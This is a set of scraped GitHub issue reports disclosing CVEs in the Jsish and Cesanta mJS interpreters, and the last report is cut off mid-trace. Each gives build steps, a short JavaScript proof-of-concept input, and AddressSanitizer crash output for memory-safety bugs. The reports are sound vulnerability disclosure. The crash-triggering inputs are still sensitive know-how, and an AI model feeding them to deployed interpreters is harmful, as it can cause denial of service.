Jsish v3.5.0 was discovered to contain a heap-use-after-free via DeleteTreeValue in src/jsiObj.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

function JSEtest() {
    var buf \= setInterval(function () {
            ws.send('0');
        }, 40)(update(Object(0)));
}

try {
    JSEtest();
} catch (e) {
    setInterval(Function.prototype, 40);
}

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
==66060==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030000001f0 at pc 0x56055c54b6fc bp 0x7ffc737457e0 sp 0x7ffc737457d0
READ of size 4 at 0x6030000001f0 thread T0
    #0 0x56055c54b6fb in DeleteTreeValue src/jsiObj.c:176
    #1 0x56055c563384 in Jsi\_TreeEntryDelete src/jsiTree.c:636
    #2 0x56055c564f10 in destroy\_node src/jsiTree.c:496
    #3 0x56055c564f10 in destroy\_node src/jsiTree.c:494
    #4 0x56055c564f10 in Jsi\_TreeDelete src/jsiTree.c:515
    #5 0x56055c54d9df in Jsi\_ObjFree src/jsiObj.c:348
    #6 0x56055c54ea0f in Jsi\_ObjDecrRefCount src/jsiObj.c:440
    #7 0x56055c3fd3d1 in ValueFree src/jsiValue.c:178
    #8 0x56055c3fd3d1 in Jsi\_ValueFree src/jsiValue.c:199
    #9 0x56055c3fd6cf in Jsi\_DecrRefCount src/jsiValue.c:52
    #10 0x56055c50d4d4 in Jsi\_EventFree src/jsiCmds.c:204
    #11 0x56055c4234e2 in freeEventTbl src/jsiInterp.c:570
    #12 0x56055c4c58dd in Jsi\_HashClear src/jsiHash.c:507
    #13 0x56055c4c5cd7 in Jsi\_HashDelete src/jsiHash.c:526
    #14 0x56055c43687c in jsiInterpDelete src/jsiInterp.c:1936
    #15 0x56055cc4d047 in jsi\_main src/main.c:49
    #16 0x7f78b6c29bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #17 0x56055c3dc969 in \_start (/usr/local/bin/jsish+0xe8969)

0x6030000001f0 is located 0 bytes inside of 32-byte region \[0x6030000001f0,0x603000000210)
freed by thread T0 here:
    #0 0x7f78b78987a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x56055c3fd6cf in Jsi\_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
    #0 0x7f78b7898d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x56055c44daa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiObj.c:176 in DeleteTreeValue
Shadow bytes around the buggy address:
  0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff8000: fa fa fd fd fd fd fa fa fd fd fd fa fa fa fd fd
  0x0c067fff8010: fd fd fa fa fd fd fd fa fa fa fd fd fd fd fa fa
  0x0c067fff8020: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
\=>0x0c067fff8030: fa fa fd fd fd fd fa fa fd fd fd fd fa fa\[fd\]fd
  0x0c067fff8040: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8050: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8060: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8070: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8080: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==66060\==ABORTING

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46495: Heap-use-after-free src/jsiObj.c:176 in DeleteTreeValue · Issue #82 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a SEGV vulnerability via Jsi_FunctionInvoke at src/jsiFunc.c. This vulnerability can lead to a Denial of Service (DoS).

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case1**

var feedback \= setInterval(Number, update(Object(ch)));
WebSocket(new Object());
update(100)(WebSocket(new Object()));

**Test case2**

function JSEtest()
{
  (arr.reduceRight(Object), 0, '1');
  arguments.callee++;
}

var arr \= new Array(10);
arr\[1\] \= 1;
arr\[2\] \= 2;
arr.forEach(JSEtest);

**Execution steps & Output**

$ ./jsish/jsish poc1.js

ASAN:DEADLYSIGNAL
=================================================================
==82851==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x5639ca50c71f bp 0x000000000000 sp 0x7ffc15eedf60 T0)
==82851==The signal is caused by a READ memory access.
==82851==Hint: address points to the zero page.
    #0 0x5639ca50c71e in Jsi\_FunctionInvoke src/jsiFunc.c:786
    #1 0x5639ca626b9d in Jsi\_EventProcess src/jsiCmds.c:292
    #2 0x5639ca6278ef in SysUpdateCmd src/jsiCmds.c:411
    #3 0x5639ca58f818 in jsi\_FuncCallSub src/jsiProto.c:244
    #4 0x5639ca85971a in jsiFunctionSubCall src/jsiEval.c:796
    #5 0x5639ca85971a in jsiEvalFunction src/jsiEval.c:837
    #6 0x5639ca85971a in jsiEvalCodeSub src/jsiEval.c:1264
    #7 0x5639ca86d15e in jsi\_evalcode src/jsiEval.c:2204
    #8 0x5639ca871274 in jsi\_evalStrFile src/jsiEval.c:2665
    #9 0x5639ca56066a in Jsi\_Main src/jsiInterp.c:936
    #10 0x5639cad6503a in jsi\_main src/main.c:47
    #11 0x7fb9a888dbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #12 0x5639ca4f4969 in \_start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiFunc.c:786 in Jsi\_FunctionInvoke
==82851==ABORTING

$ ./jsish/jsish poc2.js
ASAN:DEADLYSIGNAL
=================================================================
==62010==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x557c5b2f56b6 bp 0x603000007240 sp 0x7ffce7e9ef60 T0)
==62010==The signal is caused by a READ memory access.
==62010==Hint: address points to the zero page.
    #0 0x557c5b2f56b5 in Jsi\_FunctionInvoke src/jsiFunc.c:785
    #1 0x557c5b3ad784 in jsi\_ArrayForeachCmd src/jsiArray.c:531
    #2 0x557c5b378818 in jsi\_FuncCallSub src/jsiProto.c:244
    #3 0x557c5b64271a in jsiFunctionSubCall src/jsiEval.c:796
    #4 0x557c5b64271a in jsiEvalFunction src/jsiEval.c:837
    #5 0x557c5b64271a in jsiEvalCodeSub src/jsiEval.c:1264
    #6 0x557c5b65615e in jsi\_evalcode src/jsiEval.c:2204
    #7 0x557c5b65a274 in jsi\_evalStrFile src/jsiEval.c:2665
    #8 0x557c5b34966a in Jsi\_Main src/jsiInterp.c:936
    #9 0x557c5bb4e03a in jsi\_main src/main.c:47
    #10 0x7f35df3e6bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #11 0x557c5b2dd969 in \_start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiFunc.c:785 in Jsi\_FunctionInvoke

CVE-2021-46492: SEGV src/jsiFunc.c:786 in Jsi_FunctionInvoke · Issue #71 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ValueLookupBase in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var JSEtest \= function() {};
Function.prototype \= 12;
var obj \= JSEtest.bind({});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=================================================================
==50188==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000000228 at pc 0x55ccf1df02ee bp 0x7ffcb1d1b0a0 sp 0x7ffcb1d1b090
READ of size 1 at 0x603000000228 thread T0
    #0 0x55ccf1df02ed in jsi\_ValueLookupBase src/jsiValue.c:980
    #1 0x55ccf1df1175 in jsi\_ValueLookupBase src/jsiValue.c:1007
    #2 0x55ccf1df1175 in jsi\_ValueSubscript src/jsiValue.c:1016
    #3 0x55ccf211ad47 in jsiEvalSubscript src/jsiEval.c:997
    #4 0x55ccf211ad47 in jsiEvalCodeSub src/jsiEval.c:1283
    #5 0x55ccf213315e in jsi\_evalcode src/jsiEval.c:2204
    #6 0x55ccf2137274 in jsi\_evalStrFile src/jsiEval.c:2665
    #7 0x55ccf1e2666a in Jsi\_Main src/jsiInterp.c:936
    #8 0x55ccf262b03a in jsi\_main src/main.c:47
    #9 0x7fc99b738bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #10 0x55ccf1dba969 in \_start (/usr/local/bin/jsish+0xe8969)

0x603000000228 is located 8 bytes inside of 32-byte region \[0x603000000220,0x603000000240)
freed by thread T0 here:
    #0 0x7fc99c3a77a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x55ccf1ddb6cf in Jsi\_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
    #0 0x7fc99c3a7d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55ccf1e2baa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:980 in jsi\_ValueLookupBase
Shadow bytes around the buggy address:
  0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff8000: fa fa 00 00 00 00 fa fa 00 00 07 fa fa fa 00 00
  0x0c067fff8010: 00 00 fa fa 00 00 03 fa fa fa 00 00 00 00 fa fa
  0x0c067fff8020: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
  0x0c067fff8030: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
\=>0x0c067fff8040: 00 00 fa fa fd\[fd\]fd fd fa fa 00 00 00 00 fa fa
  0x0c067fff8050: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
  0x0c067fff8060: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
  0x0c067fff8070: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x0c067fff8080: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
  0x0c067fff8090: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==50188\==ABORTING

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46494: Heap-use-after-free src/jsiValue.c:980 in jsi_ValueLookupBase · Issue #78 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via /usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var x \= 3;
if (("ab".replace("b", "ab".constructor).replace("b", "ab".constructor)!=="aa") || (x!==undefined)) {
        throw "Err-value!";
}

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x602000001cf3 at pc 0x7fae379c366e bp 0x7ffdcb94e5a0 sp 0x7ffdcb94dd48
READ of size 2 at 0x602000001cf3 thread T0
    #0 0x7fae379c366d  (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0x5166d)
    #1 0x55927a403f60 in Jsi\_Strlen src/jsiChar.c:29
    #2 0x55927a508a57 in Jsi\_DSAppendLen src/jsiDString.c:99
    #3 0x55927a508e7f in Jsi\_DSAppend src/jsiDString.c:129
    #4 0x55927a40d4b8 in StringReplaceCmd src/jsiString.c:705
    #5 0x55927a3ed818 in jsi\_FuncCallSub src/jsiProto.c:244
    #6 0x55927a6b771a in jsiFunctionSubCall src/jsiEval.c:796
    #7 0x55927a6b771a in jsiEvalFunction src/jsiEval.c:837
    #8 0x55927a6b771a in jsiEvalCodeSub src/jsiEval.c:1264
    #9 0x55927a6cb15e in jsi\_evalcode src/jsiEval.c:2204
    #10 0x55927a6cf274 in jsi\_evalStrFile src/jsiEval.c:2665
    #11 0x55927a3be66a in Jsi\_Main src/jsiInterp.c:936
    #12 0x55927abc303a in jsi\_main src/main.c:47
    #13 0x7fae36de1bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #14 0x55927a352969 in \_start (/usr/local/bin/jsish+0xe8969)

0x602000001cf4 is located 0 bytes to the right of 4-byte region \[0x602000001cf0,0x602000001cf4)
freed by thread T0 here:
    #0 0x7fae37a507a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x55927a412c19 in StringConstructor src/jsiString.c:33

previously allocated by thread T0 here:
    #0 0x7fae37a50b40 in \_\_interceptor\_malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x55927a3c3a22 in Jsi\_Malloc src/jsiUtils.c:52

SUMMARY: AddressSanitizer: heap-use-after-free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0x5166d)
Shadow bytes around the buggy address:
  0x0c047fff8340: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff8350: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff8360: fa fa fd fd fa fa fd fd fa fa 07 fa fa fa fd fd
  0x0c047fff8370: fa fa 00 07 fa fa 00 fa fa fa 00 00 fa fa 00 00
  0x0c047fff8380: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
\=>0x0c047fff8390: fa fa 00 00 fa fa fd fa fa fa fd fa fa fa\[fd\]fa
  0x0c047fff83a0: fa fa fd fa fa fa 04 fa fa fa fa fa fa fa fa fa
  0x0c047fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff83d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff83e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46502: Heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d) · Issue #87 · pcmacdon/jsish

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_execute at src/mjs_exec.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    function JSEtest() {
        let arr = [1];
        arr.splice((arr.splice(0, 17)= [1])= [1])= [1]
    }
    JSEtest();
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==23867==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55dcd2425950 bp 0x000000000000 sp 0x7fff558e7b00 T0)
==23867==The signal is caused by a READ memory access.
==23867==Hint: address points to the zero page.
    #0 0x55dcd242594f in mjs\_execute src/mjs\_exec.c:823
    #1 0x55dcd2430a05 in mjs\_exec\_internal src/mjs\_exec.c:1073
    #2 0x55dcd2430a05 in mjs\_exec\_file src/mjs\_exec.c:1096
    #3 0x55dcd23ed909 in main src/mjs\_main.c:47
    #4 0x7f63f4c54b96 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21b96)
    #5 0x55dcd23ee449 in \_start (/usr/local/bin/mjs+0xe449)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mjs\_exec.c:823 in mjs\_execute

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46530: SEGV src/mjs_exec.c:823 in mjs_execute · Issue #206 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via mjs_get_cstring at src/mjs_string.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    function JSEtest(a) {
      (typeof((typeof"cookie-present" !== gc("$$abcdabcd")) !== function() {
          return 100;
        })) !== function() {
          return 100;
        };
    
      if ("cookie-present" !== gc("$$abcdabcd"))
        gc(true);
    
      if (a < 10)
        load(gc(JSON.stringify({ foo: [], bar: {} }, ['foo', 'bar', 'myProp'])));;
    
      if (a < 1)
        JSEtest(a+1);;
    }
    JSEtest(0)
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
=====ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60f000000203 at pc 0x5581d25fa021 bp 0x7ffff5880770 sp 0x7ffff5880760
READ of size 1 at 0x60f000000203 thread T0
    #0 0x5581d25fa020 in mjs\_get\_cstring src/mjs\_string.c:213
    #1 0x5581d253f5aa in mjs\_load src/mjs\_builtin.c:58
    #2 0x5581d2559244 in mjs\_execute src/mjs\_exec.c:853
    #3 0x5581d2562a05 in mjs\_exec\_internal src/mjs\_exec.c:1073
    #4 0x5581d2562a05 in mjs\_exec\_file src/mjs\_exec.c:1096
    #5 0x5581d251f909 in main src/mjs\_main.c:47
    #6 0x7f20b4fd4b96 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21b96)
    #7 0x5581d2520449 in \_start (/usr/local/bin/Gmjs+0xe449)

Address 0x60f000000203 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs\_string.c:213 in mjs\_get\_cstring
Shadow bytes around the buggy address:
  0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1e7fff8000: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1e7fff8010: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c1e7fff8020: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c1e7fff8030: 00 00 00 00 00 00 00 00 00 00 06 fa fa fa fa fa
=\>0x0c1e7fff8040:\[fa\]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46527: Heap-buffer-overflow src/mjs_string.c:213 in mjs_get_cstring · Issue #197 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via mjs_array_length at src/mjs_array.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    (function () {
      ((function JSEtes(a) {
        if ((a - 1)) {
          if ((isNaN)(JSON.stringify([])) !== JSON.stringify("start_port" !== [Object.create.apply({}, [Object])])) {
            JSEtes(a - 1)
          }
        }
      })(6))
    })()
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
=================================================================
==109503==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x607000000150 at pc 0x55d8ef005f6d bp 0x7ffe7d357b00 sp 0x7ffe7d357af0
READ of size 8 at 0x607000000150 thread T0
    #0 0x55d8ef005f6c in mjs\_array\_length src/mjs\_array.c:83
    #1 0x55d8ef005f6c in mjs\_array\_push src/mjs\_array.c:115
    #2 0x55d8ef027dd8 in mjs\_execute src/mjs\_exec.c:679
    #3 0x55d8ef034a05 in mjs\_exec\_internal src/mjs\_exec.c:1073
    #4 0x55d8ef034a05 in mjs\_exec\_file src/mjs\_exec.c:1096
    #5 0x55d8eeff1909 in main src/mjs\_main.c:47
    #6 0x7f6cb8331b96 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21b96)
    #7 0x55d8eeff2449 in \_start (/usr/local/bin/Gmjs+0xe449)

0x607000000150 is located 0 bytes to the right of 80-byte region \[0x607000000100,0x607000000150)
allocated by thread T0 here:
    #0 0x7f6cb89e3d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55d8ef0527be in gc\_new\_block src/mjs\_gc.c:94
    #2 0x55d8ef0527be in gc\_alloc\_cell src/mjs\_gc.c:133
    #3 0x55d8ef0527be in new\_object src/mjs\_gc.c:45

SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs\_array.c:83 in mjs\_array\_length
Shadow bytes around the buggy address:
  0x0c0e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c0e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c0e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c0e7fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 fa fa fa
  0x0c0e7fff8010: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa
\=>0x0c0e7fff8020: 00 00 00 00 00 00 00 00 00 00\[fa\]fa fa fa fa fa
  0x0c0e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46519: Heap-buffer-overflow src/mjs_array.c:83 in mjs_array_length · Issue #194 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a global buffer overflow via c_vsnprintf at mjs/src/common/str_util.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_CLANG=clang
$(DOCKER\_CLANG) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    (JSON.stringify([1, 2, 3]))((JSON.parse - 6. + 4321e2)([([JSON.parse(JSON.stringify([(0)]))])]));
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
=================================================================
==61818==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000064c54a at pc 0x0000005ea260 bp 0x7fff3bbcc940 sp 0x7fff3bbcc938
WRITE of size 4 at 0x00000064c54a thread T0
    #0 0x5ea25f in c\_vsnprintf /root/mjs/src/common/str\_util.c:180:14
    #1 0x55178f in mjs\_exec\_internal /root/mjs/src/mjs\_exec.c:1073:5
